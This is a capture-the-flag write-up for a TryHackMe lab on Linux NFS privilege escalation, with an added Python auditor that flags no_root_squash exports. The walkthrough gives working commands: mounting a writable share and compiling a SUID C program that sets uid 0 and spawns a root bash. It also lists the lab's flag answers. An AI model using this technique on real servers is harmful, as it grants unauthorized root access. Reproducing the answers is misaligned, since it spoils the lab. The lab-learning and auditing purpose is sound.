This article discusses the solution for TryHackMe's Linux Privilege Escalation SUID task, so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Privilege Escalation: NFS (Network File Sharing) Solution
Notes:
SSH and Telnet can be used for root access.
- An SSH private key found on the target system can be used to connect with root privileges.
Misconfigured network shell.
- It can be present when a network backup exists.
The NFS configuration is kept in /etc/exports.
Look for no_root_squash on a writable share, as it allows creating an executable with the SUID bit set and running it on the target system.
- By default, NFS removes root privileges from any file by changing the root user to nfsnobody.
How many mountable shares can you identify on the target system?
Run the following command on the attack machine:
showmount -e {target_machine ip}
Answer: 3
How many shares have the "no_root_squash" option enabled?
Run the following on the target machine:
cat /etc/exports
Answer: 3
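For a defender's view of the same check, here is an added example (not part of the original write-up) that parses exports-style text and flags every client entry carrying no_root_squash, rating writable ones highest. The sample file, its paths and addresses are constructed, and default-option tokens beginning with "-" are skipped as a simplifying assumption.

```python
import re

# Constructed sample in /etc/exports syntax; not the lab machine's real file.
SAMPLE_EXPORTS = """\
# path         client(options) ...
/srv/backups   *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/public    192.0.2.0/24(ro,no_root_squash) 198.51.100.7(rw,sync)
/srv/projects  *(rw,sync,root_squash) \\
               203.0.113.5(rw,no_root_squash)
/srv/media     *(ro,all_squash)
"""

ENTRY = re.compile(r"([^()]*)\(([^)]*)\)")  # client(opt1,opt2,...)

def parse_exports(text):
    """Return (path, client, options) for every client of every export."""
    entries = []
    text = text.replace("\\\n", " ")            # join continued lines
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments and blanks
        if not line:
            continue
        path, *clients = line.split()
        for tok in clients:
            if tok.startswith("-"):
                continue                        # default-option token, not handled here
            m = ENTRY.fullmatch(tok)
            client, opts = (m.group(1) or "*", m.group(2)) if m else (tok, "")
            entries.append((path, client, set(filter(None, opts.split(",")))))
    return entries

def audit(text):
    """Flag exports where root on the client keeps uid 0 on the server."""
    findings = []
    for path, client, opts in parse_exports(text):
        if "no_root_squash" not in opts:
            continue                            # root_squash is the default
        # rw + no_root_squash lets client root plant root-owned SUID files.
        severity = "high" if "rw" in opts else "review"
        findings.append({"path": path, "client": client, "severity": severity})
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE_EXPORTS):
        print(f"{f['severity']:6} {f['path']} exported to {f['client']}")
```

To audit a real server, pass the contents of its /etc/exports to audit() in place of the sample.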
What is the content of the flag7.txt file?
- Let's mount one of the mountable shares by executing the following on the attack machine:
mkdir /tmp/backupsharemounted
mount -o rw 10.10.139.175:/home/ubuntu/sharedfolder /tmp/backupsharemounted
cd /tmp/backupsharemounted
touch attack.c
- Let's update attack.c, on the attack machine, to execute /bin/bash:
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setgid(), setuid() */

int main(void)
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
- Execute the following on the attack machine:
gcc attack.c -o attack -w
chmod +s attack
- On the target machine, run:
cd /home/ubuntu/sharedfolder
and you will see the attack executable file.
- Execute the following on the target machine, and this will provide us with bash root privileges:
./attack
- Run the following on the target machine:
cat /home/matt/flag7.txt
Answer: THM-89384012
Until next time. Keep learning.
Stay stoked and code. :)